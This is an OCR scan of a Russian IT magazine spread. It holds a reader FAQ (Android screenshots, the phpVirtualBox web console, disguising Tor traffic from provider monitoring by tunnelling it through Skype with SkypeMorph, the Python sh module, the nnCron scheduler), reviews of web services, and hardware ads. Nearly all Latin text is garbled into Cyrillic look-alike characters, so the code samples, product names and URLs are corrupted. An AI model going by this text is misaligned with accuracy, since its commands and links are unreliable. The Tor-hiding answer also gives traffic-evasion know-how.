запускать Баіѵік БеЬид Мопііог (\апсІгоісІ-5СІк\ 
ІооІ5\сІсІт5.Ьаі) и из меню «Беѵісе» выбрать 
пункт «5сгееп Саріиге». Система к снятию 
скриншотов готова! 



□ Можно ли удаленно изменять параме- 
тры виртуальных машин, крутящихся 
под ѴігІиаІВох, не логинясь на хост? 



□ ѴИиаІВох, бесспорно, хорош для 

локального использования, но инстру- 
ментов, аналогичных по функционалу клиенту 
ѴЗрЬеге, для удаленной работы от прямого 
конкурента ѴМѵѵаге действительно не хвата- 
ло. К счастью, ѴігІиаІВох имеет обширное АРІ 
для управления виртуальным зоопарком. 

Этим и воспользовались создатели 
рИрѴИиаІВох ( ЬіСІу/рбрѵЫ — оболочки, 
предоставляющей аналогичные со стандарт- 
ным ЗШ-конфигуратором возможности, с тем 
лишь отличием, что все происходит удаленно 
в окне браузера. Для использования 
на серверной части придется развернуть 
веб-сервер с работающим РНР версии 
не ниже 5.1.0. Сам же интерфейс реализован 
с использованием АЭАХ и позволяет в не- 
сколько кликов изменять параметры, 
управлять состояниями, создавать и удалять 
виртуальные машины. Иными словами, 
он практически дублирует родные средства 
контроля, но не требует даже терминальной 
сессии до хоста. 



□ 



Как можно скрыть использование Тог 
от мониторинга на стороне провайдера? 
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рНрѴИиаІВох — веб-консольуправления ѴігІиаІВох 



Если по каким-либо причинам 
приходится использовать Тог, то, 
конечно, вполне логичным выглядит 
и желание скрыть факт его использования, 
чтобы не привлекать к своей персоне 
лишнего внимания. Очевидным решением 
представляется дополнительная упаковка 
трафика в еще один защищенный канал, 
например ѴРІ\І. Но такой канал детектируем и 
не хуже Тог'а кричит наблюдающему за 
трафиком: «Я использую защищенный канал! 
Мне есть что скрывать!» ;). В то же время есть 
и другие, не типичные для инкапсулирова- 
ния, достаточно защищенные протоколы. 
Например, наипопулярнейший 5куре едва ли 
вызовет хоть каплю подозрений. Для такой 
хитрой маскировки можно использовать 
совсем свежий инструмент БкуреМогрЬ ( Ьіі.Іу/ 
зкѵретогрб ). Для его сборки и последующего 
использования потребуется валидный 5куре 
Юиоплаченный(5 долларов) ЗкуреКіІ — на- 
бор инструментов и библиотек для разработ- 
ки приложений, взаимодействующих с сетью 
5куре. После сборки мы получим пару 
приложений — клиентскую и серверную 
(для точки выхода) части. Предполагается 
размещение серверной части в безопасном 
сегменте сети, например на выделенном 
сервере. В комплекте с исходными кодами 
поставляются специально составленные 
файлы конфигураций Іоггс для обеих сторон 
моста. После запуска инициализируется 
и поддерживается постоянный «видеовы- 
зов», выполняющий роль моста. Теперь, 
когда наш трафик ничем не выделяется из 
массы пользователей видеофонии, можно 
дать своей обострившейся паранойе 
передышку :). 

Хочу вместо ЬазН’а использовать 
более продвинутый вариант 
для скриптинга. По правде говоря, 
вообще бы использовал РуНіоп, но с ним 
не всегда удобно работать с системными 
утилитами и их выводом. Может, 
что-нибудь подскажете? 

Из собственного опыта могу 
посоветовать замечательный РуіЬоп- 
модуль зЬ ( атоНаЕаіЩиЬ.сот/зЬ/іпбех.ЬітІ ). 






Он делает совершенно чудесную штуку: 
подключив этот модуль, системные команды 
можно вызывать прямо в коде сценарий. 
Например, выводим параметры 
беспроводного адаптера: 

-Ргот БІі ітрогі: і-Рсопб§ 
рпіп1:(і■Рсопб§( ,, ы1ап0 ,, ) ) 

Или выводим контент в текущей директории: 

ргіігЕ(І5("-1")) 

Модуль позволяет передавать параметры 
утилите. Например, воттак: 

асИизегГ'ато-р-РаІ:" . "--зѵзііет". . \ 
"--зИеІІ". "/Ьіп/ЬазІі" . 
"--по-спеаііе-ііоте"’) 



□ Существует ли нормальная реализация 
стоп под ѴѴіпсІоѵѵз? 

□ Пожалуй, лучший планировщик под 
винду, позволяющий оченьтонко 
автоматизировать задачи и обладающий 
прекрасными возможностями по созданию 
скриптов, — это ппСгоп ( ппсгоп.ги ). Он умеет: 

• запускать произвольные программы 
как сервисы; 

• запускать задачи «от имени» указанных 
юзеров; 

• отслеживать и перезапускать просрочен- 
ные задачи и напоминалки, выключать или 
«усыплять» компьютер в заданное время, 
«будить» компьютер, чтобы запустить за- 
дачу; 

• отображать/скрывать/закрывать/убивать/ 
сворачивать/разворачивать и прятать в 
системный трей заданные окна, добавлять 
в трей произвольные иконки; 

• выводить на экран и в лог-файл любые 
сообщения, в том числе и запросы на вы- 
полнение указанных действий; 

• эмулировать клавиатурный ввод и опера- 
ции с мышкой; 

• присваивать процессам указанный приори- 
тет и прерывать работу любых запущенных 
процессов; 

• автоматически перезапускаться после 
фатальных ошибок. ПС 
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ѴБРС Ргее Ѵісіео 2.4.2.260 




БрІагЬ Ыіе 1.8.0 АгіоЩизіоп 2.9.1 Рааг 0.3.0 Ветоіе Оезкіор Соппесііоп 

ТѴеггИу 2.3 Аисіасіоиз 3.3.2 РігегЬагк 2.0.1 СІІепІ 2.1 

ѴісІеоМасЬ 5.9.7 Аѵісіетих 2.6.0 бРВРготѴіт РеііпаСаріиге 

ѴІ_С 2.0.3 ВаІІгоотсІІ 1.3 ѲпиЫз 3.1.2 БеагЬоге 0.5.1 

ѴоІите2 1.1.3 Сіппатоп 1.6 ігдІ-іпіесЯоп 0.1 БЯску ІМоШісаНопг 1.0.4 






ІЖІТ5/ѴѴѴѴѴѴ2 



ѴѴѴѴѴѴ2 



^ТЗТРАР 



]е 1 з 1 гар.сот 

ВооЫгар — популярное и удобное решение для построения интерфейса веб-приложений. 
В октябре разработчики проекта объявили: они откажутся от работы в Тѵѵіиег для того, 
чтобы направить все усилия на развитие Вооізігар, и это не может не радовать. Однако при 
использовании этого фреймворка по-прежнему многое приходится делать вручную. Чтобы 
проектировать интерфейс было проще и быстрее, можно прибегнуть к ^Ізігар — это 
графический инструмент, позволяющий работать с Вооізігар прямо в браузере. По задумке 
разработчиков, с его помощью можно создавать как прототипы, так и интерфейсы реаль- 
Сервис, позволяющий упростить проектирование интерфейса веб- ных приложений; таким образом целевая аудитория - не только кодеры и дизайнеры, но и 

сервисов с помощью всенародного любимца Вооізігар просто «люди с идеями». 




й&согсі Уоиг Тегтіпзі 

► = 52 - 



УоиТиЬе для гиков в пол ном смысле этого слова, позволяющий 
публиковать скринкасты непосредственно из консоли 



А5СІІ.І0 



азси.ю 



А5СІІ.І0 — простой инструмент для ІІІЧІХ-систем, позволяющий записывать и публиковать 
скринкасты терминала. Для работы понадобится поставить скрипт на РуіЬоп, после за- 
пуска которого все действия пользователя в консоли будут записываться в специальный 
файл. После окончания сессии видеофайл будетзагружен на сервер в учетную запись 
пользователя. Применений у такого инструмента много: видеоуроки, документация, 
А5СІІ-арт. При этом важно заметить, что весь текст в кадре можно выделить и скопиро- 
вать в свою консоль. Из недостатков сервиса — невозможность встраивания виджета 
с видеороликом (кстати, очень стильного], однако разработчики обещают исправить 
это в ближайшее время. 



ЛІМР5НАКЕ 



щтрзЬаге.сот 

^трзЬаге — сервис для быстрого обмена файлами. Да-да, еще один файлхостинг — что 
тут может быть интересного? Дело в том, что в ^трзЬаге встроена функция предпро- 
смотра для 150 типов файлов (по заявлению разработчиков) — поддерживаются все 
популярные форматы документов, изображений, видео и аудио. Максимальный размер 
файла — 2 Гб, и на данный момент срок хранения не может превышать двух недель. Также, 
поскольку разработчики еще не реализовали систему учетных записей, у пользователя 
Универсальный инструментдляобменафайлами, поддерживающий нет возможности увидеть все свои файлы единым списком или настроить доступ к ним. 

предпросмотр ІБОформатов документов и медиа Однако, по словам разработчиков, все это будет сделано в ближайшее время. 



0? 




ГгяііѴІ Ктх* І-#Л!-чгтч Г'Пѵг 




«Соло на клавиатуре» для емаксеров, 
вимеров и других фанатов горячих клавиш 



5Н0КТС1ЯР00 



Ьирз://ѵѵѵѵѵѵ. 5 Ьог 1 сииоо.сот 

зЬогІсиіРоо — сервис для обучения клавишесочетаниям в популярных текстовых редакто- 
рах (включая Ѵіт и Етасз), ЮЕ (Есіірзе, ѴізиаІ Зіисііо, ХСосІе) и других популярных инстру- 
ментах. Обучение во многом напоминаеттренажеры для десятипальцевого метода набора 
и направлено главным образом на моторную память. Для этого шорткаты разбиты на 
несколько уроков, каждый из которых состоит из нескольких этапов. После каждого урока 
пользователь должен пройти экзамен на скорость и правильность применения изученного 
материала. К сожалению, сервис платный — за неограниченный доступ ко всем урокам 
нужно заплатить девять долларов. Однако для каждого инструмента доступно несколько 
пробных уроков, что позволяет оценить эффективность сервиса. 
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Пре •сто, удобно, надежно 



Серверы №адага 
- мы знаем, 
как заставить 
технологии 
работать на вас. 



Процессор Іп№!^ Хооп® ЕЗ 

может ОЦТОМЗТИЧеСКИ 
регулировать энергопотребление 
и точно настрой пЭТЪ 
производительность сервера 
в соответствии с потребностями 
приложений. 



тѵѵлѵ.піадага.ги 

Ниагара Компьютере. Москва 
Донской з й проезд. 3 5 
Телефон: (495) 955-55-50 
(многоканальный) 



Реклама 






Дух инноваций • Путь к совершенству 



АЗІІЗ рекомендует ѴѴіпсІоѵѵз® 7. 




АЗЬЗ 7ЕІМВ00К™ Ргіте 

Невероятный ШгаЬоок™. Вдохновлен ІгМ 

С подлинной ОС ѴѴіпсіоѵѵз® 7 Домашняя расширенная 

В ПОИСКАХ НЕВЕРОЯТНОГО 

Самый утонченный ультрабук стал еще лучше благодаря высококачественному 
ІРЗ-дисплею формата РиІІ НЮ с широкими углами обзора. Превосходное качество 
изображения, высокопроизводительный процессор Іпіеі® Соге™ І7 и мощное 
графическое ядро делают элегантный 2ЕІМВ00К™ Ргіте идеальной платформой 
для мультимедийных развлечений. 




Всемирная гарантия 2 года ѵѵѵѵѵѵ.азиз.ги 

Горячая линия АЗУЗ: (495) 23-1 1 -999, 8-800-1 00-2787 ѵѵѵш.азизпЬ.ги 



АЗІЮ 7его Вгідіті ОоІ: 30-дневная дополнительная гарантия отсутствия на экране 
неисправных ярких точек. Подробнее на ѵѵѵѵѵѵ.азизпЬ.ги/гЬсІ 

Эксклюзивная сервисная программа АЗІІЗ Ріск ир & Веіигп для ноутбуков 
11X21/11X31. Подробности на ѵѵѵѵѵѵ.азизпЬ.ги/РІІВ 




ШгаЬоок' 



Реклама. Іпіеі, логотип ІпТеІ, ІпТеІ Іпзісіе, ІпТеІ Соге, ШігаЬоок и Соге ІП5ісІе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 




